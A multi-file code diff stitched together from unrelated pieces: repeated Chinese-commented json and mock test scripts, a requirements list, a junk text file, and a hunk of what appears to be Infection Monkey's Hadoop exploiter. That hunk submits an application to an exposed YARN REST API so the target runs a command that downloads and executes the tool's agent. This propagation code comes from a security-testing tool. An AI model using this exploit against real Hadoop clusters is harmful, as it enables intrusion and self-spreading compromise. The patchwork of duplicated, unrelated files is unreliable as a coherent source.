312

2132

c/test_dumps.py

@@ -0,0 +1,13 @@
+import json
+data = {
+    'name' : 'myname',
+    'age' : 100,
+}
+# separators:是分隔符的意思，参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符，把：和，后面的空格都除去了.
+# dumps 将python对象字典转换为json字符串
+json_str = json.dumps(data, separators=(',', ':'))
+print(type(json_str), json_str)
+
+# loads 将json字符串转化为python对象字典
+pyton_obj = json.loads(json_str)
+print(type(pyton_obj), pyton_obj)

monkey/infection_monkey/exploit/hadoop.py

@@ -5,13 +5,20 @@
 """
 
 import json
+import logging
 import posixpath
 import random
 import string
+from time import time
 
 import requests
 
 from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
+from common.tags import (
+    T1105_ATTACK_TECHNIQUE_TAG,
+    T1203_ATTACK_TECHNIQUE_TAG,
+    T1210_ATTACK_TECHNIQUE_TAG,
+)
 from infection_monkey.exploit.tools.helpers import get_agent_dst_path
 from infection_monkey.exploit.tools.http_tools import HTTPTools
 from infection_monkey.exploit.web_rce import WebRCE
@@ -23,6 +30,10 @@ from infection_monkey.model import (
 )
 from infection_monkey.utils.commands import build_monkey_commandline
 
+logger = logging.getLogger(__name__)
+
+HADOOP_EXPLOITER_TAG = "hadoop-exploiter"
+
 
 class HadoopExploiter(WebRCE):
     _EXPLOITED_SERVICE = "Hadoop"
@@ -32,39 +43,43 @@ class HadoopExploiter(WebRCE):
     # Random string's length that's used for creating unique app name
     RAN_STR_LEN = 6
 
+    _EXPLOITER_TAGS = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG)
+
+    _PROPAGATION_TAGS = (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG)
+
     def __init__(self):
         super(HadoopExploiter, self).__init__()
 
     def _exploit_host(self):
-        # Try to get exploitable url
+        # Try to get potential urls
-        urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
+        potential_urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
-        self.add_vulnerable_urls(urls, True)
+        if not potential_urls:
-        if not self.vulnerable_urls:
+            self.exploit_result.error_message = (
+                f"No potential exploitable urls has been found for {self.host}"
+            )
             return self.exploit_result
 
-        try:
+        monkey_path_on_victim = get_agent_dst_path(self.host)
-            monkey_path_on_victim = get_agent_dst_path(self.host)
-        except KeyError:
-            return self.exploit_result
 
         http_path, http_thread = HTTPTools.create_locked_transfer(
             self.host, str(monkey_path_on_victim), self.agent_binary_repository
         )
 
+        command = self._build_command(monkey_path_on_victim, http_path)
         try:
-            command = self._build_command(monkey_path_on_victim, http_path)
+            for url in potential_urls:
-
+                if self.exploit(url, command):
-            if self.exploit(self.vulnerable_urls[0], command):
+                    self.add_executed_cmd(command)
-                self.add_executed_cmd(command)
+                    self.exploit_result.exploitation_success = True
-                self.exploit_result.exploitation_success = True
+                    self.exploit_result.propagation_success = True
-                self.exploit_result.propagation_success = True
+                    break
         finally:
             http_thread.join(self.DOWNLOAD_TIMEOUT)
             http_thread.stop()
 
         return self.exploit_result
 
-    def exploit(self, url, command):
+    def exploit(self, url: str, command: str):
         if self._is_interrupted():
             self._set_interrupted()
             return False
@@ -73,8 +88,8 @@ class HadoopExploiter(WebRCE):
         resp = requests.post(
             posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
         )
-        resp = json.loads(resp.content)
+        resp_dict = json.loads(resp.content)
-        app_id = resp["application-id"]
+        app_id = resp_dict["application-id"]
 
         # Create a random name for our application in YARN
         # random.SystemRandom can block indefinitely in Linux
@@ -87,10 +102,16 @@ class HadoopExploiter(WebRCE):
             self._set_interrupted()
             return False
 
+        timestamp = time()
         resp = requests.post(
             posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
         )
-        return resp.status_code == 202
+
+        success = resp.status_code == 202
+        message = "" if success else f"Failed to exploit via {url}"
+        self._publish_exploitation_event(timestamp, success, error_message=message)
+        self._publish_propagation_event(timestamp, success, error_message=message)
+        return success
 
     def check_if_exploitable(self, url):
         try:

requirements.txt

@@ -0,0 +1,8 @@
+allure_python_commons==2.8.17
+jsonpath==0.82
+loguru==0.5.1
+pandas==1.1.5
+PyMouse==1.0
+pytest==6.2.5
+pywin32==301
+selenium==3.141.0

test03.txt

@@ -0,0 +1 @@
+双方都是的方法烦烦烦烦烦烦

test_dumps

@@ -0,0 +1,13 @@
+import json
+data = {
+    'name' : 'myname',
+    'age' : 100,
+}
+# separators:是分隔符的意思，参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符，把：和，后面的空格都除去了.
+# dumps 将python对象字典转换为json字符串
+json_str = json.dumps(data, separators=(',', ':'))
+print(type(json_str), json_str)
+
+# loads 将json字符串转化为python对象字典
+pyton_obj = json.loads(json_str)
+print(type(pyton_obj), pyton_obj)

test_dumps.py

@@ -0,0 +1,13 @@
+import json
+data = {
+    'name' : 'myname',
+    'age' : 100,
+}
+# separators:是分隔符的意思，参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符，把：和，后面的空格都除去了.
+# dumps 将python对象字典转换为json字符串
+json_str = json.dumps(data, separators=(',', ':'))
+print(type(json_str), json_str)
+
+# loads 将json字符串转化为python对象字典
+pyton_obj = json.loads(json_str)
+print(type(pyton_obj), pyton_obj)

test_dumps01.py

@@ -0,0 +1,13 @@
+import json
+data = {
+    'name' : 'myname',
+    'age' : 100,
+}
+# separators:是分隔符的意思，参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符，把：和，后面的空格都除去了.
+# dumps 将python对象字典转换为json字符串
+json_str = json.dumps(data, separators=(',', ':'))
+print(type(json_str), json_str)
+
+# loads 将json字符串转化为python对象字典
+pyton_obj = json.loads(json_str)
+print(type(pyton_obj), pyton_obj)

test_dumps03.py

@@ -0,0 +1 @@
+print('1111')

zmtest04/test_mock.py

@@ -0,0 +1,21 @@
+import unittest
+from mock import Mock
+
+
+def VerifyPhone():
+    '''
+    校验用户手机号
+    '''
+    pass
+
+
+class TestVerifyPhone(unittest.TestCase):
+
+    def test_verify_phone(self):
+        data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
+        VerifyPhone = Mock(return_value=data)
+        self.assertEqual("success", VerifyPhone()["msg"]["result"])
+        print('测试用例')
+
+if __name__ == '__main__':
+    unittest.main(verbosity=2)

zmtest05 - 副本/test_mock.py

@@ -0,0 +1,21 @@
+import unittest
+from mock import Mock
+
+
+def VerifyPhone():
+    '''
+    校验用户手机号
+    '''
+    pass
+
+
+class TestVerifyPhone(unittest.TestCase):
+
+    def test_verify_phone(self):
+        data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
+        VerifyPhone = Mock(return_value=data)
+        self.assertEqual("success", VerifyPhone()["msg"]["result"])
+        print('测试用例')
+
+if __name__ == '__main__':
+    unittest.main(verbosity=2)

zmtest05/test_mock.py

@@ -0,0 +1,21 @@
+import unittest
+from mock import Mock
+
+
+def VerifyPhone():
+    '''
+    校验用户手机号
+    '''
+    pass
+
+
+class TestVerifyPhone(unittest.TestCase):
+
+    def test_verify_phone(self):
+        data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
+        VerifyPhone = Mock(return_value=data)
+        self.assertEqual("success", VerifyPhone()["msg"]["result"])
+        print('测试用例')
+
+if __name__ == '__main__':
+    unittest.main(verbosity=2)